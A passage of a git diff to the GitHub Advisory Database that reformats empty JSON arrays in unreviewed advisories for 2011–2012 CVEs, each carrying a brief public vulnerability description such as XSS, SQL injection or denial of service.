file upload vulnerability in the patient photograph functionality in OpenEMR 4 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension followed by a safe extension, then accessing it via a direct request to the patient directory under documents/.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-35g9-4fjq-g938/GHSA-35g9-4fjq-g938.json b/advisories/unreviewed/2022/05/GHSA-35g9-4fjq-g938/GHSA-35g9-4fjq-g938.json index 48ef5b88408..e1052109479 100644 --- a/advisories/unreviewed/2022/05/GHSA-35g9-4fjq-g938/GHSA-35g9-4fjq-g938.json +++ b/advisories/unreviewed/2022/05/GHSA-35g9-4fjq-g938/GHSA-35g9-4fjq-g938.json @@ -7,12 +7,8 @@ "CVE-2012-3302" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Domino 7.x and 8.x before 8.5.4 allow remote attackers to inject arbitrary web script or HTML via (1) a URL accessed during use of the Mail template in the WebMail UI or (2) a URL accessed during use of Domino Help through the Domino HTTP server.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-35gp-6hvq-gx74/GHSA-35gp-6hvq-gx74.json b/advisories/unreviewed/2022/05/GHSA-35gp-6hvq-gx74/GHSA-35gp-6hvq-gx74.json index e77fe84bd65..9efc2653112 100644 --- a/advisories/unreviewed/2022/05/GHSA-35gp-6hvq-gx74/GHSA-35gp-6hvq-gx74.json +++ b/advisories/unreviewed/2022/05/GHSA-35gp-6hvq-gx74/GHSA-35gp-6hvq-gx74.json @@ -7,12 +7,8 @@ "CVE-2012-3130" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 11 allows remote attackers to affect integrity via unknown vectors related to pkg.depotd.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-363x-qxhw-jjx9/GHSA-363x-qxhw-jjx9.json b/advisories/unreviewed/2022/05/GHSA-363x-qxhw-jjx9/GHSA-363x-qxhw-jjx9.json index 710fcfd709d..adb8e6515b6 100644 --- a/advisories/unreviewed/2022/05/GHSA-363x-qxhw-jjx9/GHSA-363x-qxhw-jjx9.json +++ b/advisories/unreviewed/2022/05/GHSA-363x-qxhw-jjx9/GHSA-363x-qxhw-jjx9.json @@ -7,12 +7,8 @@ "CVE-2012-0944" ], "details": "Aptdaemon 0.43 and earlier in Ubuntu 11.04, 11.10, and 12.04 LTS does not authenticate packages when the transaction is not simulated, which allows remote attackers to install arbitrary packages via a man-in-the-middle attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3822-wwjm-jgg2/GHSA-3822-wwjm-jgg2.json b/advisories/unreviewed/2022/05/GHSA-3822-wwjm-jgg2/GHSA-3822-wwjm-jgg2.json index 60fd2cf0617..981d84e263a 100644 --- a/advisories/unreviewed/2022/05/GHSA-3822-wwjm-jgg2/GHSA-3822-wwjm-jgg2.json +++ b/advisories/unreviewed/2022/05/GHSA-3822-wwjm-jgg2/GHSA-3822-wwjm-jgg2.json @@ -7,12 +7,8 @@ "CVE-2012-0715" ], "details": "Cross-site scripting (XSS) vulnerability in the Gantt applet viewer in IBM Tivoli Change and Configuration Management Database (CCMDB) 7.2.1 and IBM ILOG JViews Gantt allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-38hc-j6w3-jg6w/GHSA-38hc-j6w3-jg6w.json b/advisories/unreviewed/2022/05/GHSA-38hc-j6w3-jg6w/GHSA-38hc-j6w3-jg6w.json index 1f7c4eb8267..d20e24fc96f 100644 --- a/advisories/unreviewed/2022/05/GHSA-38hc-j6w3-jg6w/GHSA-38hc-j6w3-jg6w.json +++ b/advisories/unreviewed/2022/05/GHSA-38hc-j6w3-jg6w/GHSA-38hc-j6w3-jg6w.json @@ -7,12 +7,8 @@ "CVE-2012-2073" ], "details": "The Bundle copy module 7.x-1.x before 7.x-1.1 for Drupal does not check for the \"use PHP for settings\" permission while importing settings, which allows remote authenticated users with certain permissions to execute arbitrary PHP code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-38jr-m6hg-2c25/GHSA-38jr-m6hg-2c25.json b/advisories/unreviewed/2022/05/GHSA-38jr-m6hg-2c25/GHSA-38jr-m6hg-2c25.json index d25d886f408..2d5e26ff5b5 100644 --- a/advisories/unreviewed/2022/05/GHSA-38jr-m6hg-2c25/GHSA-38jr-m6hg-2c25.json +++ b/advisories/unreviewed/2022/05/GHSA-38jr-m6hg-2c25/GHSA-38jr-m6hg-2c25.json @@ -7,12 +7,8 @@ "CVE-2012-3234" ], "details": "RealNetworks RealPlayer before 15.0.6.14, RealPlayer SP 1.0 through 1.1.5, and Mac RealPlayer before 12.0.1.1750 do not properly handle codec frame sizes in RealAudio files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) or possibly have unspecified other impact via a crafted file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-38vh-68q7-274w/GHSA-38vh-68q7-274w.json b/advisories/unreviewed/2022/05/GHSA-38vh-68q7-274w/GHSA-38vh-68q7-274w.json index edf36dd823b..ffa0b707ffd 100644 --- a/advisories/unreviewed/2022/05/GHSA-38vh-68q7-274w/GHSA-38vh-68q7-274w.json +++ b/advisories/unreviewed/2022/05/GHSA-38vh-68q7-274w/GHSA-38vh-68q7-274w.json @@ -7,12 +7,8 @@ "CVE-2012-2081" ], "details": "The Organic Groups (OG) module 6.x-2.x before 6.x-2.3 for Drupal does not properly restrict access, which allows remote attackers to obtain sensitive information such as private group titles via a request through the Views module.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3979-2hvm-67c3/GHSA-3979-2hvm-67c3.json b/advisories/unreviewed/2022/05/GHSA-3979-2hvm-67c3/GHSA-3979-2hvm-67c3.json index 152de224ee8..fc1c8e19922 100644 --- a/advisories/unreviewed/2022/05/GHSA-3979-2hvm-67c3/GHSA-3979-2hvm-67c3.json +++ b/advisories/unreviewed/2022/05/GHSA-3979-2hvm-67c3/GHSA-3979-2hvm-67c3.json @@ -7,12 +7,8 @@ "CVE-2012-2664" ], "details": "The sosreport utility in the Red Hat sos package before 2.2-29 does not remove the root user password information from the Kickstart configuration file (/root/anaconda-ks.cfg) when creating an archive of debugging information, which might allow attackers to obtain passwords or password hashes.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-39gp-f464-jp5h/GHSA-39gp-f464-jp5h.json b/advisories/unreviewed/2022/05/GHSA-39gp-f464-jp5h/GHSA-39gp-f464-jp5h.json index 0e5606ba760..d22d745d3ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-39gp-f464-jp5h/GHSA-39gp-f464-jp5h.json +++ b/advisories/unreviewed/2022/05/GHSA-39gp-f464-jp5h/GHSA-39gp-f464-jp5h.json @@ -7,12 +7,8 @@ "CVE-2011-5225" ], "details": "Cross-site scripting (XSS) vulnerability in wordpress_sentinel.php in the Sentinel plugin 1.0.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-39p4-8vxf-w6mq/GHSA-39p4-8vxf-w6mq.json b/advisories/unreviewed/2022/05/GHSA-39p4-8vxf-w6mq/GHSA-39p4-8vxf-w6mq.json index 3b9183c1b25..0bf5ea9705f 100644 --- a/advisories/unreviewed/2022/05/GHSA-39p4-8vxf-w6mq/GHSA-39p4-8vxf-w6mq.json +++ b/advisories/unreviewed/2022/05/GHSA-39p4-8vxf-w6mq/GHSA-39p4-8vxf-w6mq.json @@ -7,12 +7,8 @@ "CVE-2012-1027" ], "details": "Cross-site scripting (XSS) vulnerability in account-closed.tcl in ]project-open[ (aka ]po[) 3.4.x, 3.5.0.1-2, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the message parameter to register/account-closed.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3c65-jw75-c45f/GHSA-3c65-jw75-c45f.json b/advisories/unreviewed/2022/05/GHSA-3c65-jw75-c45f/GHSA-3c65-jw75-c45f.json index ca9ac5e7302..bf15bac3160 100644 --- a/advisories/unreviewed/2022/05/GHSA-3c65-jw75-c45f/GHSA-3c65-jw75-c45f.json +++ b/advisories/unreviewed/2022/05/GHSA-3c65-jw75-c45f/GHSA-3c65-jw75-c45f.json @@ -7,12 +7,8 @@ "CVE-2012-2584" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Alt-N MDaemon Free 12.5.4 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) the Cascading Style Sheets (CSS) expression property in conjunction with a CSS comment within the STYLE attribute of an IMG element, (2) the CSS expression property in conjunction with multiple CSS comments within the STYLE attribute of an arbitrary element, or (3) an innerHTML attribute within an XML document.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3ccc-w666-988q/GHSA-3ccc-w666-988q.json b/advisories/unreviewed/2022/05/GHSA-3ccc-w666-988q/GHSA-3ccc-w666-988q.json index 19f4d6e0abf..30cf79cb463 100644 --- a/advisories/unreviewed/2022/05/GHSA-3ccc-w666-988q/GHSA-3ccc-w666-988q.json +++ b/advisories/unreviewed/2022/05/GHSA-3ccc-w666-988q/GHSA-3ccc-w666-988q.json @@ -7,12 +7,8 @@ "CVE-2012-2579" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the WP SimpleMail plugin 1.0.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) To, (2) From, (3) Date, or (4) Subject field of an email.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3cj6-xrqf-w8rv/GHSA-3cj6-xrqf-w8rv.json b/advisories/unreviewed/2022/05/GHSA-3cj6-xrqf-w8rv/GHSA-3cj6-xrqf-w8rv.json index 91dc82180e4..1e580bc9e3d 100644 --- a/advisories/unreviewed/2022/05/GHSA-3cj6-xrqf-w8rv/GHSA-3cj6-xrqf-w8rv.json +++ b/advisories/unreviewed/2022/05/GHSA-3cj6-xrqf-w8rv/GHSA-3cj6-xrqf-w8rv.json @@ -7,12 +7,8 @@ "CVE-2012-1658" ], "details": "Cross-site scripting (XSS) vulnerability in the Read More Link module 6.x-3.x before 6.x-3.1 for Drupal allows remote authenticated users with the access administration pages permission to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3f36-xgxj-8g4q/GHSA-3f36-xgxj-8g4q.json b/advisories/unreviewed/2022/05/GHSA-3f36-xgxj-8g4q/GHSA-3f36-xgxj-8g4q.json index 1d697ca9f78..0dda48cb9df 100644 --- a/advisories/unreviewed/2022/05/GHSA-3f36-xgxj-8g4q/GHSA-3f36-xgxj-8g4q.json +++ b/advisories/unreviewed/2022/05/GHSA-3f36-xgxj-8g4q/GHSA-3f36-xgxj-8g4q.json @@ -7,12 +7,8 @@ "CVE-2012-3355" ], "details": "(1) AlbumTab.py, (2) ArtistTab.py, (3) LinksTab.py, and (4) LyricsTab.py in the Context module in GNOME Rhythmbox 0.13.3 and earlier allows local users to execute arbitrary code via a symlink attack on a temporary HTML template file in the /tmp/context directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3f6j-r62c-wxpv/GHSA-3f6j-r62c-wxpv.json b/advisories/unreviewed/2022/05/GHSA-3f6j-r62c-wxpv/GHSA-3f6j-r62c-wxpv.json index f5c6a09c70a..2ce578f1a7e 100644 --- a/advisories/unreviewed/2022/05/GHSA-3f6j-r62c-wxpv/GHSA-3f6j-r62c-wxpv.json +++ b/advisories/unreviewed/2022/05/GHSA-3f6j-r62c-wxpv/GHSA-3f6j-r62c-wxpv.json @@ -7,12 +7,8 @@ "CVE-2012-0906" ], "details": "SQL injection vulnerability in the Moviebase addon for deV!L'z Clanportal (DZCP) 1.5.5 allows remote attackers to execute arbitrary SQL commands via the id parameter in a showkat action to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3f7j-hfc7-xqvr/GHSA-3f7j-hfc7-xqvr.json b/advisories/unreviewed/2022/05/GHSA-3f7j-hfc7-xqvr/GHSA-3f7j-hfc7-xqvr.json index d5456ad4ded..1cc146672af 100644 --- a/advisories/unreviewed/2022/05/GHSA-3f7j-hfc7-xqvr/GHSA-3f7j-hfc7-xqvr.json +++ b/advisories/unreviewed/2022/05/GHSA-3f7j-hfc7-xqvr/GHSA-3f7j-hfc7-xqvr.json @@ -7,12 +7,8 @@ "CVE-2012-1629" ], "details": "Cross-site scripting (XSS) vulnerability in the Taxotouch module for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3ff8-84vr-26hx/GHSA-3ff8-84vr-26hx.json b/advisories/unreviewed/2022/05/GHSA-3ff8-84vr-26hx/GHSA-3ff8-84vr-26hx.json index b5a43733b8c..14515e1d33d 100644 --- a/advisories/unreviewed/2022/05/GHSA-3ff8-84vr-26hx/GHSA-3ff8-84vr-26hx.json +++ b/advisories/unreviewed/2022/05/GHSA-3ff8-84vr-26hx/GHSA-3ff8-84vr-26hx.json @@ -7,12 +7,8 @@ "CVE-2011-4222" ], "details": "Unspecified vulnerability in Investintech.com Able2Extract and Able2Extract Server allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted document.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3fj2-69h6-55v5/GHSA-3fj2-69h6-55v5.json b/advisories/unreviewed/2022/05/GHSA-3fj2-69h6-55v5/GHSA-3fj2-69h6-55v5.json index d337cb89551..979cb6b902b 100644 --- a/advisories/unreviewed/2022/05/GHSA-3fj2-69h6-55v5/GHSA-3fj2-69h6-55v5.json +++ b/advisories/unreviewed/2022/05/GHSA-3fj2-69h6-55v5/GHSA-3fj2-69h6-55v5.json @@ -7,12 +7,8 @@ "CVE-2012-0735" ], "details": "IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not properly scan file: URLs, which allows man-in-the-middle attackers to obtain sensitive information or possibly have unspecified other impact via a crafted URI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3gr9-x3xp-765c/GHSA-3gr9-x3xp-765c.json b/advisories/unreviewed/2022/05/GHSA-3gr9-x3xp-765c/GHSA-3gr9-x3xp-765c.json index 73a1b1fdc55..fe6f5b66516 100644 --- a/advisories/unreviewed/2022/05/GHSA-3gr9-x3xp-765c/GHSA-3gr9-x3xp-765c.json +++ b/advisories/unreviewed/2022/05/GHSA-3gr9-x3xp-765c/GHSA-3gr9-x3xp-765c.json @@ -7,12 +7,8 @@ "CVE-2012-1108" ], "details": "The parse function in ogg/xiphcomment.cpp in TagLib 1.7 and earlier allows remote attackers to cause a denial of service (crash) via a crafted vendorLength field in an ogg file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3h7q-h379-g658/GHSA-3h7q-h379-g658.json b/advisories/unreviewed/2022/05/GHSA-3h7q-h379-g658/GHSA-3h7q-h379-g658.json index f1e285e4de2..8b21e37b787 100644 --- a/advisories/unreviewed/2022/05/GHSA-3h7q-h379-g658/GHSA-3h7q-h379-g658.json +++ b/advisories/unreviewed/2022/05/GHSA-3h7q-h379-g658/GHSA-3h7q-h379-g658.json @@ -7,12 +7,8 @@ "CVE-2012-1152" ], "details": "Multiple format string vulnerabilities in the error reporting functionality in the YAML::LibYAML (aka YAML-LibYAML and perl-YAML-LibYAML) module 0.38 for Perl allow remote attackers to cause a denial of service (process crash) via format string specifiers in a (1) YAML stream to the Load function, (2) YAML node to the load_node function, (3) YAML mapping to the load_mapping function, or (4) YAML sequence to the load_sequence function.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3hjw-v7hq-3973/GHSA-3hjw-v7hq-3973.json b/advisories/unreviewed/2022/05/GHSA-3hjw-v7hq-3973/GHSA-3hjw-v7hq-3973.json index d422c5cc719..89d93ebde38 100644 --- a/advisories/unreviewed/2022/05/GHSA-3hjw-v7hq-3973/GHSA-3hjw-v7hq-3973.json +++ b/advisories/unreviewed/2022/05/GHSA-3hjw-v7hq-3973/GHSA-3hjw-v7hq-3973.json @@ -7,12 +7,8 @@ "CVE-2012-1024" ], "details": "Directory traversal vulnerability in file in Enigma2 Webinterface 1.5rc1 and 1.5beta4 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3j3g-99r7-m38x/GHSA-3j3g-99r7-m38x.json b/advisories/unreviewed/2022/05/GHSA-3j3g-99r7-m38x/GHSA-3j3g-99r7-m38x.json index 9a617b563af..38c4eee4421 100644 --- a/advisories/unreviewed/2022/05/GHSA-3j3g-99r7-m38x/GHSA-3j3g-99r7-m38x.json +++ b/advisories/unreviewed/2022/05/GHSA-3j3g-99r7-m38x/GHSA-3j3g-99r7-m38x.json @@ -7,12 +7,8 @@ "CVE-2012-1653" ], "details": "Cross-site scripting (XSS) vulnerability in the Taxonomy Views Integrator (TVI) module 6.x-1.x before 6.x-1.3 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, related to \"views pages.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3j4w-c76p-2jvh/GHSA-3j4w-c76p-2jvh.json b/advisories/unreviewed/2022/05/GHSA-3j4w-c76p-2jvh/GHSA-3j4w-c76p-2jvh.json index fc340ea7690..057f4dd9ca1 100644 --- a/advisories/unreviewed/2022/05/GHSA-3j4w-c76p-2jvh/GHSA-3j4w-c76p-2jvh.json +++ b/advisories/unreviewed/2022/05/GHSA-3j4w-c76p-2jvh/GHSA-3j4w-c76p-2jvh.json @@ -7,12 +7,8 @@ "CVE-2012-3793" ], "details": "Integer overflow in Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in Pro-face Pro-Server EX 1.30.000 and earlier, allows remote attackers to cause a denial of service (daemon crash) via a crafted packet with a certain opcode that triggers an incorrect memory allocation and a buffer overflow.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3mc5-93px-3fm6/GHSA-3mc5-93px-3fm6.json b/advisories/unreviewed/2022/05/GHSA-3mc5-93px-3fm6/GHSA-3mc5-93px-3fm6.json index d67b0d44d67..ebd9bbaf14d 100644 --- a/advisories/unreviewed/2022/05/GHSA-3mc5-93px-3fm6/GHSA-3mc5-93px-3fm6.json +++ b/advisories/unreviewed/2022/05/GHSA-3mc5-93px-3fm6/GHSA-3mc5-93px-3fm6.json @@ -7,12 +7,8 @@ "CVE-2011-5142" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Open Business Management (OBM) 2.4.0-rc13 and probably earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tf_delegation, (2) tf_ip, or (3) tf_name parameter in a search action to host/host_index.php; (4) login parameter to obm.php; or (5) tf_user parameter in a search action to group/group_index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3mgg-22gr-vqxv/GHSA-3mgg-22gr-vqxv.json b/advisories/unreviewed/2022/05/GHSA-3mgg-22gr-vqxv/GHSA-3mgg-22gr-vqxv.json index 2086a81de0c..ca8645cc53d 100644 --- a/advisories/unreviewed/2022/05/GHSA-3mgg-22gr-vqxv/GHSA-3mgg-22gr-vqxv.json +++ b/advisories/unreviewed/2022/05/GHSA-3mgg-22gr-vqxv/GHSA-3mgg-22gr-vqxv.json @@ -7,12 +7,8 @@ "CVE-2011-3995" ], "details": "Unspecified vulnerability in Twilight Frontier Touhou Hisouten 1.06 and earlier allows remote attackers to cause a denial of service (daemon crash) via unknown network traffic.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3mq9-phgq-f2wv/GHSA-3mq9-phgq-f2wv.json b/advisories/unreviewed/2022/05/GHSA-3mq9-phgq-f2wv/GHSA-3mq9-phgq-f2wv.json index 555b3bc53e9..f12dd381681 100644 --- a/advisories/unreviewed/2022/05/GHSA-3mq9-phgq-f2wv/GHSA-3mq9-phgq-f2wv.json +++ b/advisories/unreviewed/2022/05/GHSA-3mq9-phgq-f2wv/GHSA-3mq9-phgq-f2wv.json @@ -7,12 +7,8 @@ "CVE-2012-1578" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in MediaWiki 1.17.x before 1.17.3 and 1.18.x before 1.18.2 allow remote attackers to hijack the authentication of users with the block permission for requests that (1) block a user via a request to the Block module or (2) unblock a user via a request to the Unblock module.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3p28-g7gh-66v2/GHSA-3p28-g7gh-66v2.json b/advisories/unreviewed/2022/05/GHSA-3p28-g7gh-66v2/GHSA-3p28-g7gh-66v2.json index c63a8e63caa..269d785c4a8 100644 --- a/advisories/unreviewed/2022/05/GHSA-3p28-g7gh-66v2/GHSA-3p28-g7gh-66v2.json +++ b/advisories/unreviewed/2022/05/GHSA-3p28-g7gh-66v2/GHSA-3p28-g7gh-66v2.json @@ -7,12 +7,8 @@ "CVE-2012-1812" ], "details": "eosfailoverservice.exe in C3-ilex EOScada before 11.0.19.2 allows remote attackers to obtain sensitive cleartext information via a session on TCP port 12000.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3p4f-49f4-vm6q/GHSA-3p4f-49f4-vm6q.json b/advisories/unreviewed/2022/05/GHSA-3p4f-49f4-vm6q/GHSA-3p4f-49f4-vm6q.json index 30fb46b781b..72d1198e8c8 100644 --- a/advisories/unreviewed/2022/05/GHSA-3p4f-49f4-vm6q/GHSA-3p4f-49f4-vm6q.json +++ b/advisories/unreviewed/2022/05/GHSA-3p4f-49f4-vm6q/GHSA-3p4f-49f4-vm6q.json @@ -7,12 +7,8 @@ "CVE-2012-0939" ], "details": "Multiple SQL injection vulnerabilities in TestLink 1.8.5b and earlier allow remote authenticated users with the Requirement view permission to execute arbitrary SQL commands via the req_spec_id parameter to (1) reqSpecAnalyse.php, (2) reqSpecPrint.php, or (3) reqSpecView.php in requirements/. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3p4v-hp85-8j3w/GHSA-3p4v-hp85-8j3w.json b/advisories/unreviewed/2022/05/GHSA-3p4v-hp85-8j3w/GHSA-3p4v-hp85-8j3w.json index faf78b619b4..0c107074746 100644 --- a/advisories/unreviewed/2022/05/GHSA-3p4v-hp85-8j3w/GHSA-3p4v-hp85-8j3w.json +++ b/advisories/unreviewed/2022/05/GHSA-3p4v-hp85-8j3w/GHSA-3p4v-hp85-8j3w.json @@ -7,12 +7,8 @@ "CVE-2012-0702" ], "details": "Information Services Framework (ISF) in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 does not properly determine authorization, which allows remote authenticated users to gain privileges via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3pjm-j8pf-453f/GHSA-3pjm-j8pf-453f.json b/advisories/unreviewed/2022/05/GHSA-3pjm-j8pf-453f/GHSA-3pjm-j8pf-453f.json index 5bd65b7de5f..b100a923daf 100644 --- a/advisories/unreviewed/2022/05/GHSA-3pjm-j8pf-453f/GHSA-3pjm-j8pf-453f.json +++ b/advisories/unreviewed/2022/05/GHSA-3pjm-j8pf-453f/GHSA-3pjm-j8pf-453f.json @@ -7,12 +7,8 @@ "CVE-2012-2276" ], "details": "The IRM Server in EMC Documentum Information Rights Management 4.x before 4.7.0100 and 5.x before 5.0.1030 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via input data that (1) lacks FIPS fields or (2) has an invalid version number.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3pp9-9wp8-5qp5/GHSA-3pp9-9wp8-5qp5.json b/advisories/unreviewed/2022/05/GHSA-3pp9-9wp8-5qp5/GHSA-3pp9-9wp8-5qp5.json index bced0a30d61..e8c7eb96174 100644 --- a/advisories/unreviewed/2022/05/GHSA-3pp9-9wp8-5qp5/GHSA-3pp9-9wp8-5qp5.json +++ b/advisories/unreviewed/2022/05/GHSA-3pp9-9wp8-5qp5/GHSA-3pp9-9wp8-5qp5.json @@ -7,12 +7,8 @@ "CVE-2012-2570" ], "details": "Cross-site scripting (XSS) vulnerability in products_map.php in X-Cart Gold 4.5 allows remote attackers to inject arbitrary web script or HTML via the symb parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3v5j-fv58-rhv5/GHSA-3v5j-fv58-rhv5.json b/advisories/unreviewed/2022/05/GHSA-3v5j-fv58-rhv5/GHSA-3v5j-fv58-rhv5.json index daadff64123..09fc27e6bc3 100644 --- a/advisories/unreviewed/2022/05/GHSA-3v5j-fv58-rhv5/GHSA-3v5j-fv58-rhv5.json +++ b/advisories/unreviewed/2022/05/GHSA-3v5j-fv58-rhv5/GHSA-3v5j-fv58-rhv5.json @@ -7,12 +7,8 @@ "CVE-2012-3566" ], "details": "Opera before 12.00 Beta allows user-assisted remote attackers to cause a denial of service (application hang) via JavaScript code that changes a form before submission.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3w6q-chqr-4j8j/GHSA-3w6q-chqr-4j8j.json b/advisories/unreviewed/2022/05/GHSA-3w6q-chqr-4j8j/GHSA-3w6q-chqr-4j8j.json index 4ba24dc3aeb..54287f8d0f8 100644 --- a/advisories/unreviewed/2022/05/GHSA-3w6q-chqr-4j8j/GHSA-3w6q-chqr-4j8j.json +++ 